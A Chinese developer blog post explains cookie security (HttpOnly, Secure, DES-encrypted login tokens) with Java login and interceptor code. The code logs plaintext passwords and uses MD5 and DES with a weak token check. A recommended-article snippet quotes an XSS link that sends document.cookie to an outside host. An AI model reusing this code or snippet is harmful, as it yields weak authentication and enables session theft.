cookie 安全性学习心得

最新推荐文章于 2022-09-05 11:57:41 发布
最新推荐文章于 2022-09-05 11:57:41 发布
阅读量435 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/QiaoXM/article/details/81395482
版权

cookie安全性学习心得

知识剖析

       cookie的安全性体现在cookie的传输和保存、cookie加密算法两个方面

下面是对以上两方面最基础的体现

       1、cookie的属性设置

(1)httponly属性, IE6开始支持cookie的HttpOnly属性,cookie中的HttpOnly属性被设置为true时 HttpOnly会话cookie支持的浏览器,将仅用于发送HTTP(或HTTPS)请求时,从而限制从其他非HTTP的API(如JavaScript脚本、 Applet等)访问。 阻止客户端脚本访问Cookie

        在Servlet3中,web.xml中设置

<session-config>
          <cookie-config>
            <http-only>true</http-only>
            <secure>true</secure>
          </cookie-config>
    </session-config>

(2)secure属性

当设置为true时,表示创建的 Cookie 会被以安全的形式向服务器传输,也就是只能在 HTTPS 连接中被浏览器传递到服务器端进行会话验证,如果是 HTTP 连接则不会传递该信息,所以不会被盗取到Cookie的具体内容。

 

secure属性是防止信息在传递的过程中被监听捕获后信息泄漏。

HttpOnly属性的目的是防止程序获取cookie后进行攻击。

 

2、给cookie添加加密算法

编写DES加密的工具类,

登录流程:

验证登录   >>   登陆成功   >>  对用户ID和登录时间进行加密放在token中  >> 创建cookie:把token放进去

登录状态验证:

拦截器拦截url   >>  cookie的非空验证   >>   遍历cookie   >>   根据代码验证cookie中的value

根据代码验证cookie中的value

          (1)通过与数据库中指定信息对比

          (2)通过一定的方法验证cookie中的信息

                           cookie1:name=userName

                           cookie2:userId+userName+user登录时间戳

                   都通过DES加密,添加到cookie;

                   解密中cookie的value,取出userName进行比较,进行验证。

顺便返回userName,实现用户标识:

其他深入cookie安全性的知识:http、https的安全性;SSL协议;加密算法方面等

 

编码实战

按照上面的流程和验证方法,简单的例子

@RequestMapping(value = "/login", method = RequestMethod.POST)
    public String login(HttpServletRequest request, HttpServletResponse response, People people, DESUtil desUtil) throws UnsupportedEncodingException {

        logger.info("login:参数" + request.getParameter("passward") + request.getParameter("name"));

        //MD5加密加盐
        people.setPassword(DigestUtils.md5Hex(people.getPassword()) + "abc");
        //登录验证userService.login方法
        boolean loginType = userService.login(people.getName(), people.getPassword());

        logger.info("验证结果" + loginType);
        //登录时间
        people.setUpdateTime(System.currentTimeMillis());
        //DES加密
        String str1 = desUtil.encryptFromLong(people.getUpdateTime());
        String str2 = desUtil.encryptFromLong(people.getId());
        //token:登录时间、用户Id、用户姓名加密组成
        String token = desUtil.encrypt(str1 + "|" + people.getName() + str2);
        if (loginType) {

            logger.info("登录成功");
            //添加cookie
            Cookie namecookie = new Cookie("name", people.getName());// 新建一个Cookie对象
            Cookie tokencookie = new Cookie("token", token);
            namecookie.setMaxAge(30 * 60);// 设置为30min,生命周期
            tokencookie.setMaxAge(30 * 60);
            namecookie.setPath("/");//设置Cookie的使用路径
            tokencookie.setPath("/");
            response.addCookie(namecookie);// 保存cookie到客户端
            response.addCookie(tokencookie);

            return "redirect:/people";
        } else {
            logger.info("登陆失败");
            return "fail";
        }
    }

拦截器中进行验证

//遍历cookie如果找到登录状态则返回true执行原来controller的方法
            for (Cookie cookie : cookies) {
                if (cookie.getName().equals("name")) {
                    //在页面显示登录用户
                    name = cookie.getValue();
                    logger.info("登录用户name-------------" + name);
                }
                if (cookie.getName().equals("token")) {
                    logger.info("token验证" + cookie.getValue());
                    //token解密
                    token = cookie.getValue();
                    String str3 = desUtil.decrypt(token);
                    //取出用户name信息
                    String name2 = str3.split("\\|")[1];
                    logger.info(name2);
                    //根据token解密后,验证用户name是否一致
                    if (name.equals(name2)) {
                        request.getSession().setAttribute("name", name);
                        return true;
                    }
                }

 

QiaoXM
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
深入分析Cookie安全性问题
01-19
但是,Cookie作为用户身份的替代,其安全性有时决定了整个系统的安全性Cookie安全性问题不容忽视。 (1)Cookie欺骗 Cookie记录了用户的帐户ID、密码之类的信息,通常使用MD5方法加密后在网上传递。经过加密处理
Cookie安全
weixin_33928137的博客
02-20 138
Cookie安全 Cookie是一个神奇的机制,同域内浏览器中发出的任何一个请求都会带上Cookie,无论请求什么资源,请求时,Cookie出现在请求头的Cookie字段中。服务端响应头的Set-Cookie字段可以添加、修改和删除Cookie,大多数情况下,客户端通过JavaScript也可以添加、修改和删除Cookie。 由于这样的机制,Cookie经常被用来存储用户的会话信息,比如,用户...
Cookie学习心得
webnoob
04-25 1466
cookie是浏览器的一种缓存机制,根据不同的浏览器存在于本地文件,例如chrome的本地路径为:C:\Users\zws\AppData\Local\Google\Chrome\User Data\Default\Cookies  (其中zws对应你的用户名)cookie可以真正做到js的全局变量,应用比如保存登录信息,购物车信息,网页主题保存等...cookie存储方式以名-值对形式,如:do...
cookie安全性
qq_43936524的博客
05-16 523
文章目录cookie概述cookie的储存cookie的属性cookie的安全问题httponly无session验证cookie覆盖攻击 cookie概述 由于HTTP协议是无状态的,而服务器端的业务必须是要有状态的。Cookie诞生的最初目的是为了存储web中的状态信息,以方便服务器端使用。比如判断用户是否是第一次访问网站。 cookie的流程如下图所示。第一次访问后服务端铜鼓set-cookie报文头在客户端设置一个cookie字段。之后客户端每次访问cookie指定域名的地址都会在请求中加上cook
Cookie 安全
allway2的博客
09-05 1771
攻击者将会话标识符强制输入目标用户的浏览器,然后等待用户登录。出于本文的目的,请注意计时攻击是可能的,因为浏览器在跨站点请求中包含会话 cookie。在本文中,您将了解有关 HTTP cookie 安全性、什么是与 cookie 相关的攻击以及如何防御它们的所有信息。在 http:// 或 ws:// 请求中包含使用属性设置的 cookie,只有 https:// 和 ws://。请注意会话 cookie 是如何通过未加密的连接传输的,该会话 cookie 仅应在 HTTPS 页面上使用。
有关Cookie的安全常识
向远处看的专栏
04-28 1266
Cookies现在经常被大家提到,那么到底什么是Cookies,它有什么作用呢?Cookies是一种能够让网站服务器把少量数据储存到客户端的硬盘或内存,或是从客户端的硬盘读取数据的一种技术。Cookies是当你浏览某网站时,由Web服务器置于你硬盘上的一个非常小的文本文件,它可以记录你的用户ID、密码、浏览过的网页、停留的时间等信息。当你再次来到该网站时,网站通过读取Cookies,得知你的相关信
JSP学习心得
01-08
作者:徐春金下面是本人在学习JSP时的一些心得: 一、JSP工作原理在一个JSP文件第一次被请求时,JSP引擎把该JSP文件转换成为一个servlet。而这个引擎本身也是一个servlet,在JSWDK或WEBLOGIC中,它就是JspServlet。 ...
PHP中cookie知识点学习
01-20
什么是cookie cookie,即小饼干,是保存在用户代理端(浏览器是最常见的用户代理)的一些数据片段。浏览网页时,浏览器会将 当前页面有效的 cookie放在请求的头部发送到服务端。 cookie组成 cookie由以下几部分组成...
.net Cookies安全性实践分析
01-01
跨站脚本攻击一直是Web上常见的手段之一,攻击一般是劫持用户会话,拿到私有的钥匙。如何劫持这个会话呢? 一、Sniffer(这里采用的软件是Sniffer,java版的那个) Sniffer监听会话是不可护的,就和KOF里拉尔夫的...
cookie学习总结
qq_43266440的博客
10-20 154
1.cookie 上网的过程: 1.首次打开网页,向服务器端发送请求,浏览器端和服务器端会建立连接,完成请求和响应,断开连接 2. 再次点击超链时,向服务器端再次发送请求,浏览器端和服务器端再次建立连接,完成请求和响应,再次断开连接 3.带来的问题:服务器如何知道本次请求和上次请求,同一个客户端?? 4.客户端用cookie,服务器端用session。 5.首次请求,服务器端会分配一个sess...
Cookie安全性问题
01-19 459
Cookie的目的是为用户带来方便,为网站带来增值,一般情况下不会造成严重的安全威胁。Cookie文件不能作为代码执行,也不会传送病毒,它为用户所专有并只能由创建它的服务器来读取。另外,浏览器一般只允许存放300个Cookie,每个站点最多存放20个Cookie,每个Cookie的大小限制为4...
Cookie安全性分析
qq_37158580的博客
04-22 4782
浅谈cookie安全性 摘要 HTTP State Management Mechanism(HTTP状态管理机制)一文中,定义了HTTP Cookie和Set-Cookie头字段。HTTP服务器利用这种头字段,在HTTP用户代理(浏览器)中存储当前状态,使得在大多数无状态的HTTP协议下,服务器可以维持一个有状态的回话。虽然,在安全性和隐私性上,cookie有许多历史性的不合理处,但是...
Cookie学习总结
为实现自我而奋斗
06-05 912
Cookie有哪些属性name cookie的名字 value cookie存储的值 maxAge cookie的销毁时间 path 该cookie在该path路径及其子目录下可以显示 domain cookie的域 comment cookie的注释,用来描述该cookie的目的 secure 是否基于https安全传输下面重点总结下cookie的如
浅谈cookie安全
课嗨教育的专栏
04-03 2444
0x01 简介 1. cookie简述 由于HTTP协议是无状态的,而服务器端的业务必须是要有状态的。Cookie诞生的最初目的是为了存储web中的状态信息,以方便服务器端使用。比如判断用户是否是第一次访问网站。目前最新的规范是RFC 6265,它是一个由浏览器服务器共同协作实现的规范。服务端可以通过http的响应对cookie进行增加、修改和删除。而在客户端中也可以通过脚本语言如:JavaScript对其进行同样的操作。 2. cookie的组成结构 Cookie的字段一般分为: [name]
cookie安全
----------------
12-13 531
跨站点脚本XSS使用跨站点脚本技术可以窃取cookie。当网站允许使用javascript操作cookie的时候,就会发生攻击者发布恶意代码攻击用户的会话,同时可以拿到用户cookie信息。例子: <a href="#" onclick=`window.location=http://abc.com?cookie=${docuemnt.cookie}`>领取红包</a>当用户点击这个链接的时候,
Cookie学习小结
七月_的博客
08-02 383
Cookie Cookie(复数形态Cookies),中文名称为“小型文本文件”或“小甜饼”,指某些网站为了辨别用户身份而储存在用户本地终端(Client Side)上的数据(通常经过加密)cookie 只包含数据,就其本身而言并不有害。   分类 Cookie总是保存在客户端中,按在客户端中的存储位置,可分为内存Cookie和硬盘Cookie。 内存Cookie由浏览器维护,保存在内存...
Cookie安全性
逍遥快活一书生的博客
05-07 500
HTTP 协议不仅是无状态的 也是不安全的 使用http协议的数据不经过任何加密就直接在网络上传播,有被截获的可能。使用HTTP协议传输狠机密的内容是一件很危险的事情,如果不希望Cookie在HTTP等不安全的协议中传输,可以设置Cookie的secure属性为true。这样浏览器只会在HTTPS和SSL等安全协议中传输此类Cookie。 例如:Cookie cookie=new Cookie(
cookie安全性解决办法
最新发布
09-09
对于确保 cookie安全性,可以采取以下几种解决办法: 1. 使用 HTTPS 协议:通过使用 HTTPS 加密协议来传输请求和响应,可以防止中间人窃听和篡改的风险,确保数据的安全性。 2. 设置 Secure 标记:在设置 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值